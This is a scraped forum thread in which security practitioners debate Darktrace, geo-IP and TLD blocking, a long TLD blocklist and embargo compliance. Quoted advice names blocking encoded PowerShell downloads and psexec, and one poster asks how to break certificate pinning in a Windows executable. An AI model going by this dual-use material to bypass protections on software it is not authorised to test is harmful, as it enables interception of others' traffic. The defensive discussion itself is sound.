Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us $3,400 per month for bandwidth bills alone, and since we don't believe in shoving popup ads to our registered users, we try to make the money back through forum registrations.
 
  • Post
  • Reply
geonetix
Mar 6, 2011




Potato Salad posted:

like, what threat model does darktrace help address

the threat model of your employer not spending enough money on bullshit

Adbot
ADBOT LOVES YOU

Internet Explorer
Jun 1, 2005


Potato Salad posted:

idk if darktrace helps improve awareness of ongoing modern c&c / exfiltration methods

like, what threat model does darktrace help address

efb

geonetix posted:

the threat model of your employer not spending enough money on bullshit

Yeah, it's nonsense and I think I may have an opening to kill it off so I'd like to.

It claims to watch network traffic and pick out things that look out of place. Anything from "this user logged into this computer, which we think is odd" to "a file that looks like it contains passwords was accessed off this server" to "this device seems to be communicating to a C&C server."

I actually don't know if there's an industry term for what it does. Network Traffic Analysis? Network Detection and Response? My main problem with it is that it generates a ton of false alerts and honestly needs someone who spends time with it, but we're not big enough to have someone who just doesn't infosec.

It seems even less useful to us than normal with everyone working remotely. We also use Defender ATP, but I guess there is some value in something that monitors the underlying network and doesn't rely on the client/host.

Martytoof
Feb 25, 2003







I trialed DT and it picked up some (noisy) red team exercise stuff so I dunno, itís definitely doing something. We were in the middle of redoing our SIEM so Iím not sure if they would have picked it up or not but holy poo poo for the price they charge I kind of want the appliance to not just detect intrusion but dispatch a hired goon to the source geolocation.

Martytoof fucked around with this message at 22:55 on Oct 6, 2020

Internet Explorer
Jun 1, 2005


Right, that's kinda where I'm at. I know we "got a good deal on it" but it's coming up for renewal and you know how that goes. Right now we need to spend more time on the fundamentals and I am really hoping that I can free up that budget for more down to earth solutions. It's not my money, but we don't have unlimited funds and I'd rather see them go somewhere else.

Martytoof
Feb 25, 2003







Internet Explorer posted:

I actually don't know if there's an industry term for what it does. Network Traffic Analysis? Network Detection and Response? My main problem with it is that it generates a ton of false alerts and honestly needs someone who spends time with it, but we're not big enough to have someone who just doesn't infosec.

Itís just some kind of fancy baseline deviation algorithm probably. I donít know for a fact but I would suspect it would be pretty effective inside a closed, static application environment. Like if you have an environment that runs a customer facing service your baseline traffic and patterns probably deviate a LOT less than an office with human beings and my GUESS is that it would be more on-point there with fewer false positives.

Then again, in an environment with a limited subset of expected traffic you could probably piece together something to detect this kind of activity without their price tag. Not saying itís not difficult but I bet the insights youíd get into an environment and the tools you stand up would be much more valuable as a learning exercise.

evil_bunnY
Apr 2, 2003



Isn't DT literally just bayesian filtering for your traffic/logs?

Dazzo
Jun 22, 2006



DT is not good technology. Iíve seen it used across multiple different environments and the ML models are pure noise. The times that Iíve seen it catch things, it was due to the classic network signatures it has (that any network ids would have).

Network sensors in general in this day and age are kind of a waste of money. Unless you have your network setup so it can man in the middle SSL traffic, a network sensor is a literal waste because it canít inspect the encrypted SSL traffic and more and more malware is using SSL for C2 comms. Spend your money instead on a good cross platform EDR.

Potato Salad
Oct 23, 2014

Nobody Cares




Tortured By Flan

there are some NDR tools these days that do substantially more than dark trace ever did. I'm still not sold on the concept of NDR, and I think it's just old engineers trying to sell old products to old it managers who work in old companies that are finally looking at trying to take security seriously for the first time in a century

edit: not to mention that DT doesn't even R

Potato Salad fucked around with this message at 13:28 on Oct 7, 2020

Potato Salad
Oct 23, 2014

Nobody Cares




Tortured By Flan

heck, Azure Sentinel could be thought of as an upgrade to darktrace, and it's not even trying to compete in that old-timey "these log levels are novel" alert system sector

geonetix
Mar 6, 2011




The magical combination of EDR + zscaler + device trust on authentication is fantastic for solving most problems tbh

AlternateAccount
Apr 25, 2005
FYGM

RFC2324 posted:

does anyone think remote desktoping in is cool without explicit approval, because it seems like a no brainer that getting caught at it will get you a talking to nowadays

and as far as tunneling out, if your org is that hardcore about what you are browsing just use your drat phone

Also a lot of methods aggressively advertise themselves and just make it super easy. Chrome Remote Desktop, for example.

Bob Morales
Aug 18, 2006

I love the succulent taste of cop boots

What's the consensus on blocking based on Geo-IP and things like TLD?

My manager blocked everything that wasn't US-based traffic at one point. I've been slowly adding countries back to the list, since because of cloud-based services we were seeing all kinds of denials for legitimate traffic.

What's being pushed for now is blocking all of the 'new' TLD's. Basically anything that isn't a com/net/org/edu/mil

This is just a headache. Security theatre thanks to some dumb mailing lists he is on.

In my mind, those are kind of silly things to rely upon. Sure, you get some protection from random Chinese/Russian botnets, and we don't have any customers that aren't in the USA, but it's not scalable and hard to manage.

Bob Morales fucked around with this message at 17:19 on Oct 7, 2020

Bob Morales
Aug 18, 2006

I love the succulent taste of cop boots

Also, is https://security.stackexchange.com/ worth adding to the OP?

The Fool
Oct 16, 2003



Blocking tldís is dumb

We block Russia and China, but I donít think it actually accomplishes anything except maybe reducing the noise a little

There is still plenty of malicious traffic coming from places you canít block

Proteus Jones
Feb 28, 2013





The Fool posted:

Blocking tldís is dumb

We block Russia and China, but I donít think it actually accomplishes anything except maybe reducing the noise a little

There is still plenty of malicious traffic coming from places you canít block

Most of the poo poo like a driveby on some website or CNC poo poo for a downloaded/phished bot is just as likely to be based in a compromised system that passes the whitelist anyway so...

Biowarfare
Nov 8, 2010

I JUST WISH THIS WAS A PONY SO I COULD JERK IT WHILE I PLAY WOW

Bob Morales posted:

What's the consensus on blocking based on Geo-IP and things like TLD?

My manager blocked everything that wasn't US-based traffic at one point. I've been slowly adding countries back to the list, since because of cloud-based services we were seeing all kinds of denials for legitimate traffic.

What's being pushed for now is blocking all of the 'new' TLD's. Basically anything that isn't a com/net/org/edu/mil

This is just a headache. Security theatre thanks to some dumb mailing lists he is on.

In my mind, those are kind of silly things to rely upon. Sure, you get some protection from random Chinese/Russian botnets, and we don't have any customers that aren't in the USA, but it's not scalable and hard to manage.

The result is log reduction and absolutely nothing more. There is a huge amount of small ISPs (usually rural or WISP startups) that are leasing dirty IP space from CN/RU/whatever. Consider also dropping all of SC/ZA while you're at it. There are multiple /8s in aggregate that were stolen and hijacked and are being used daily for abuse.


Also, you can just buy a US proxy for a cent a day, so really it's just log reduction.

Bob Morales
Aug 18, 2006

I love the succulent taste of cop boots

Okay, so I'm not off-base when I recommend not doing these. I'll probably be forced to anyway.

The .bazar domain has been linked to the Bazar malware so OMG

Here's the email that was forwarded to me, from a mailing list:

Some dildo that probably makes double what I make posted:

MAILING LIST,

What top level domains does your organization currently block?

In light of BAZARLOADER, .bazar is a good TLD to block.

Thank you

XXXXXXX
Sr. Information Security Analyst Ė Information Services

Some other dildo posted:

YMMV, but this is the list that weíve been blocking for a while now.

*.bazar/
*.bid/
*.cf/
*.click/
*.club/
*.cricket/
*.date/
*.ga/
*.gdn/
*.gq/
*.life/
*.loan/
*.men/
*.ml/
*.mobi/
*.moe/
*.news/
*.nu/
*.online/
*.party/
*.photography/
*.photos/
*.press/
*.pw/
*.racing/
*.review/
*.science/
*.space/
*.stream/
*.study/
*.tk/
*.today/
*.top/
*.toys/
*.trade/
*.vip/
*.vn/
*.wang/
*.webcam/
*.website/
*.win/
*.xyz/

Volmarias
Dec 31, 2002


.men but not .women? Wait till the MRA people hear this one

CLAM DOWN
Feb 13, 2007


RICKARUS

It's Moot baby!




lol at that list

Phosphine
May 30, 2011




They block .nu? Like half of Swedish web pages are .nu, because it means now in Swedish. Famous scammer country.

RFC2324
Jun 7, 2012

Http 418


I'm the trailing / showing a block of websites, not actually blocking ips

xtal
Jan 9, 2011



My personal domain and email address is on xyz lol

Bob Morales
Aug 18, 2006

I love the succulent taste of cop boots

quote:

If you have technology that can block encoded powershell commands, powershell from downloading scripts or files from the internet, etc..* it can stop the early phases of Trickbot/Emotet and other malware.
For example, McAfee anti-exploit rules and custom expert rules.
Blocking psexec is also helpful (a tool commonly used in spreading). *

Pablo Bluth
Sep 7, 2007

I've made a huge mistake.


I have a .co domain so every exchange if my email address has to include the discussion 'not dot UK?'

Biowarfare
Nov 8, 2010

I JUST WISH THIS WAS A PONY SO I COULD JERK IT WHILE I PLAY WOW

Bob Morales posted:

The .bazar domain has been linked to the Bazar malware so OMG

This is a blockchain TLD, it isn't even publicly resolvable on the internet

Subjunctive
Sep 12, 2006

careful now


Biowarfare posted:

blockchain TLD

boy, I didn't need to know that that was even a thing, at all

Biowarfare
Nov 8, 2010

I JUST WISH THIS WAS A PONY SO I COULD JERK IT WHILE I PLAY WOW

Subjunctive posted:

boy, I didn't need to know that that was even a thing, at all

this is the new https://en.wikipedia.org/wiki/New.net

(you might as well block .onion while youre at it)

Subjunctive
Sep 12, 2006

careful now



that's definitely something that didn't need a remake

Bob Morales
Aug 18, 2006

I love the succulent taste of cop boots

Biowarfare posted:

This is a blockchain TLD, it isn't even publicly resolvable on the internet



https://emercoin.com/en/documentati...ns-introduction

Biowarfare
Nov 8, 2010

I JUST WISH THIS WAS A PONY SO I COULD JERK IT WHILE I PLAY WOW

yeah if you're curious there's a handful of alternative dns roots of sorts

the biggest network of separate resolvers is opennic

https://en.wikipedia.org/wiki/OpenN...ring_agreements

IIRC, other than for .onion, most malware don't bother running their own software (like actual blockchain clients), most of them just try to resolve against a random public resolver instead of the local system resolver

Biowarfare fucked around with this message at 18:46 on Oct 7, 2020

abigserve
Sep 13, 2009

this is a better avatar than what I had before


It's unreasonable to do geo-ip blocking but you should definitely consume as many good threat intel feeds as you can, and pull them into automatic blacklists.

Biowarfare
Nov 8, 2010

I JUST WISH THIS WAS A PONY SO I COULD JERK IT WHILE I PLAY WOW

I haven't done this in a while, what's the easiest way to break cert pinning on a Win32 application?

file magic says PE32 executable (GUI) Intel 80386, for MS Windows; as far as I know it ships with embedded OpenSSL and a bunch of CA certificates embedded into the exe.


edit: I'm going to hex editing a DER into one of the replacements and see what happens, lol

Biowarfare fucked around with this message at 12:20 on Oct 9, 2020

Achmed Jones
Oct 16, 2004









It's very likely you're legally compelled to block traffic from embargoed countries. Geoip blocking is useless for actually preventing attacks from those countries, but does fulfill your legal obligation*

*In my experience, that is. I am not a lawyer, this is not legal advice

The Fool
Oct 16, 2003



Achmed Jones posted:

It's very likely you're legally compelled to block traffic from embargoed countries. Geoip blocking is useless for actually preventing attacks from those countries, but does fulfill your legal obligation*

*In my experience, that is. I am not a lawyer, this is not legal advice

that just sounds dumb on its face

random ip traffic is not the same as doing business with

RFC2324
Jun 7, 2012

Http 418


The Fool posted:

that just sounds dumb on its face

random ip traffic is not the same as doing business with

Usually, for legal purposes, you just need to be able to point at a thing and say "see? An attempt was made!" And your liability is covered

Achmed Jones
Oct 16, 2004









What, stupid legal interpretations of tech poo poo? Well I never

Context also matters. Infosec person at a large legal firm vs a saas shop vs an ad network vs netflix

Achmed Jones
Oct 16, 2004









RFC2324 posted:

Usually, for legal purposes, you just need to be able to point at a thing and say "see? An attempt was made!" And your liability is covered

This is exactly how it was explained to me at oldjob lol

xtal
Jan 9, 2011



The Fool posted:

that just sounds dumb on its face

random ip traffic is not the same as doing business with

Good luck explaining the difference to an 80 year old judge with syphilis and covid

Internet Explorer
Jun 1, 2005


If you need to follow ITAR or something, it's absolutely something that you'll need to do. Pretty much for the reasons stated above.

Adbot
ADBOT LOVES YOU

klosterdev
Oct 10, 2006

Na na na na na na na na Batman!

xtal posted:

Good luck explaining the difference to an 80 year old judge with syphilis and covid

Are we talking about the Google/Oracle API Copyright case now

  • 1
  • 2
  • 3
  • 4
  • 5
  • Post
  • Reply